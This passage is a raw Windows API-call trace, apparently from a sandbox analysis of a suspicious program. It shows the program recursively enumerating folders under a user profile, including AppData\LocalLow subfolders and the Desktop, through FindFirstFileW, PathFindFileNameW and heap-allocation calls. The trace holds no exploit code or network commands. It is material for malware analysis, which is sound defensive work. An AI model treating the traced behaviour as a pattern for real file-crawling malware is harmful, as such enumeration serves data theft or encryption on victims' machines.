PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0134.646] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.646] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.646] PathFindFileNameW (pszPath="") returned="" [0134.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2de0 [0134.646] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0134.646] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14690 [0134.646] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd148f0 [0134.646] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0134.646] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0134.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0134.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0134.647] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0134.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0134.647] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0134.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0134.647] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0134.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd4b528 [0134.647] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0134.647] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.647] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.647] PathFindFileNameW (pszPath="") returned="" [0134.647] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd148f0 [0134.647] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0134.648] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0ad0 [0134.648] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0b78 [0134.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0134.648] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0134.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0134.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2f78 [0134.648] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0134.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0134.648] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0134.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0134.648] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0134.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd4b528 [0134.648] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.648] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.648] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.649] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.649] PathFindFileNameW (pszPath="") returned="" [0134.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0b78 [0134.649] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0134.649] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2f78 [0134.649] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2de0 [0134.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0134.649] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\") returned="IME12\\" [0134.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3000 [0134.649] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0134.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.649] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0134.650] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0134.650] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0134.650] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0134.650] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd4b528 [0134.650] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.650] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0134.650] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.650] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.650] PathFindFileNameW (pszPath="") returned="" [0134.650] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14690 [0134.650] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IME12\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0134.763] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.763] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14690 [0134.763] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.763] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14ab8 [0134.763] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0134.763] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\") returned="IMJP12\\" [0134.763] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2f78 [0134.763] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0134.763] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.763] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0134.764] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0134.764] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0134.764] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0134.764] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd4b528 [0134.764] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.764] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0134.764] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.764] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.764] PathFindFileNameW (pszPath="") returned="" [0134.764] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14ab8 [0134.764] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP12\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0134.764] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.764] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14690 [0134.764] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.764] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14ab8 [0134.764] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0134.764] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\") returned="IMJP8_1\\" [0134.764] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.764] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2f78 [0134.765] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0134.765] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0134.765] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0134.765] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0134.765] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0134.765] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd4b528 [0134.765] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.765] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0134.765] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.765] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.765] PathFindFileNameW (pszPath="") returned="" [0134.765] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14ab8 [0134.765] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0134.765] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.765] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14690 [0134.765] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.765] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14ab8 [0134.765] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0134.766] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\") returned="IMJP9_0\\" [0134.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2f78 [0134.766] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0134.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0134.766] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0134.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0134.766] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0134.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd4b528 [0134.766] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0134.766] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.766] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.766] PathFindFileNameW (pszPath="") returned="" [0134.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd14ab8 [0134.766] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0134.766] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0ad0 [0134.766] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0b78 [0134.766] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0134.767] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0134.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0134.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2f78 [0134.767] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0134.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0134.767] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0134.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0134.767] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0134.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd4b528 [0134.767] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.767] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.767] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.767] PathFindFileNameW (pszPath="") returned="" [0134.767] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa0) returned 0xdcf0b78 [0134.767] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0134.768] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2f78 [0134.768] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3000 [0134.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0134.768] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0134.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0134.768] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0134.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5d58 [0134.768] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0134.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.768] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0134.769] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0134.769] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd4b528 [0134.769] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.769] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0134.769] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.769] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.769] PathFindFileNameW (pszPath="") returned="" [0134.769] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3000 [0134.769] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xdce3b70 [0134.770] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.770] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xb0) returned 0x74f84c8 [0134.770] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.770] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xb0) returned 0x74f8410 [0134.770] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0134.770] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\1CFZl0DcOIDSxuQjynmb\\") returned="1CFZl0DcOIDSxuQjynmb\\" [0134.770] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750ca80 [0134.770] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2f78 [0134.770] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\") returned="_117G\\" [0134.770] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0134.770] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\") returned="_BvYf_mP_z7pO60\\" [0134.770] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c4e0 [0134.770] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0134.770] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd4b528 [0134.770] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.770] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8f58 [0134.770] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.770] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.770] PathFindFileNameW (pszPath="") returned="" [0134.770] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xb0) returned 0x74f8410 [0134.770] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_BvYf_mP_z7pO60\\_117G\\1CFZl0DcOIDSxuQjynmb\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, 